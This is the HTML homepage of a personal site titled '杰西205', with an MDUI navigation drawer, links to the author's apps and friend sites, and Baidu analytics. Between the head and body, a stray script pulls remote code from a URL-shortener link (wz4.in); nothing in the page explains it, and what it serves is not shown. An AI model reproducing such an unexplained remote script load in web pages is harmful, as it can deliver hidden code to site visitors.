<!DOCTYPE html>
<html>

<head>
	<meta charset="utf-8" />
	<meta name="viewport" content="width=device-width" />
	<title>杰西205</title>
	<link rel="stylesheet" href="css/mdui.min.css" />
	<link rel="icon" sizes="any" mask="" href="favicon.ico">
	<script src="js/mdui.min.js">

	</script>
	<script>
		var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?8e2ae9ff6db2baf65d3bc440743804f6";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
	</script>
</head>

<script>
	$.require('http://wz4.in/1E2BE0G');

</script>

<body class="mdui-appbar-with-toolbar mdui-loaded mdui-drawer-body-left" style="">




	<div class="mdui-drawer" id="drawer">
		<ul class="mdui-list">
			<a href="/">
				<li class="mdui-list-item mdui-ripple">
					<i class="mdui-list-item-icon mdui-icon material-icons">home</i>
            <div class="mdui-list-item-content">首页</div>
          </li>
        </a>

        <li class="mdui-subheader">自制网站</li>
        <a href="baiduhomelite/index.html" target="_blank">
          <li class="mdui-list-item mdui-ripple">
            <i class="mdui-list-item-icon mdui-icon material-icons">pets</i>
            <div class="mdui-list-item-content">百度一下Lite</div>
          </li>
        </a>
        <li class="mdui-subheader">自制软件</li>
        <a href="https://club.huawei.com/thread-16610826-1-1.html" target="_blank">
          <li class="mdui-list-item mdui-ripple">
            <i class="mdui-list-item-icon mdui-icon material-icons"></i>
            <div class="mdui-list-item-content">畅玩6x工具箱</div>
          </li>
        </a>
        <a href="https://www.coolapk.com/apk/com.Jesse205.hellotool" target="_blank">
          <li class="mdui-list-item mdui-ripple">
            <i class="mdui-list-item-icon mdui-icon material-icons"></i>
            <div class="mdui-list-item-content">Hello Tool</div>
          </li>
        </a>
        <li class="mdui-subheader">友情链接</li>
		  <a href="http://test.yunchu.cxoip.com" target="_blank">
			<li class="mdui-list-item mdui-ripple">
			  <i class="mdui-list-item-icon mdui-icon material-icons">cloud</i>
			  <div class="mdui-list-item-content">云储</div>
			</li>
		  </a>
		  <a href="https://www.shouji.com.cn" target="_blank">
          <li class="mdui-list-item mdui-ripple">
            <i class="mdui-list-item-icon mdui-icon material-icons">store</i>
            <div class="mdui-list-item-content">手机乐园</div>
          </li>
        </a>
        <a href="https://www.ygktool.cn/" target="_blank">
          <li class="mdui-list-item mdui-ripple">
            <i class="mdui-list-item-icon mdui-icon material-icons">business_center</i>
            <div class="mdui-list-item-content">云极客工具箱</div>
          </li>
        </a>
        <li class="mdui-subheader">其他</li>
        <a href="https://wj.qq.com/s2/4305059/9fed/?preview=deliver" target="_blank">
          <li class="mdui-list-item mdui-ripple">
            <i class="mdui-list-item-icon mdui-icon material-icons">help</i>
            <div class="mdui-list-item-content">反馈</div>
          </li>
        </a>
      </ul>
	</div>



<style>
		@media screen and (max-width: 765px) {
			#pc {
				display: none;
			}

		}

		@media screen and (min-width: 600px) {
			#mobile {
				display: none;
			}
		}
</style>


	<div class="main-section" id="pc">
      <header class="header mdui-appbar mdui-appbar-fixed mdui-appbar-scroll-hide mdui-headroom">
        <div class="mdui-toolbar">
          <span id="toggle" class="mdui-btn mdui-btn-icon mdui-ripple" mdui-drawer="{target: '#main-drawer', swipe: true}">
            <i class="mdui-icon material-icons">menu</i></span>
          <span class="mdui-typo-title">杰西205</span>
        </div>
      </header>
      <h1>这是电脑的页面</h1>
    </div>

    <div class="main-section" id="mobile">
      <header class="header mdui-appbar mdui-appbar-fixed mdui-appbar-scroll-hide mdui-headroom">
        <div class="mdui-toolbar">
          <span id="toggle2" class="mdui-btn mdui-btn-icon mdui-ripple" mdui-drawer="{target: '#main-drawer', swipe: true}">
            <i class="mdui-icon material-icons">menu</i></span>
          <span class="mdui-typo-title">杰西205</span>
          <div class="mdui-toolbar-spacer"></div>
          <a href="javascript:;" class="mdui-btn mdui-btn-icon" mdui-menu="{target: '#example-attr'}"><i class="mdui-icon material-icons">more_vert</i></a>
          <ul class="mdui-menu" id="example-attr">
          </ul>
        </div>
      </header>

      <h1>这是手机的页面</h1>
    </div>


<script type="text/javascript">
var inst = new mdui.Drawer('#drawer');
// method
document.getElementById('toggle').addEventListener('click', function () {
                                                       inst.toggle();
                                                   });
document.getElementById('toggle2').addEventListener('click', function () {
                                                        inst.toggle();
                                                    });
// event
var drawer = document.getElementById('drawer');
drawer.addEventListener('open.mdui.drawer', function () {
                            console.log('open');
                        });
drawer.addEventListener('opened.mdui.drawer', function () {
                            console.log('opened');
                        });
drawer.addEventListener('close.mdui.drawer', function () {
                            console.log('close');
                        });
drawer.addEventListener('closed.mdui.drawer', function () {
                            console.log('closed');
                        });
</script>

  </body>

</html>
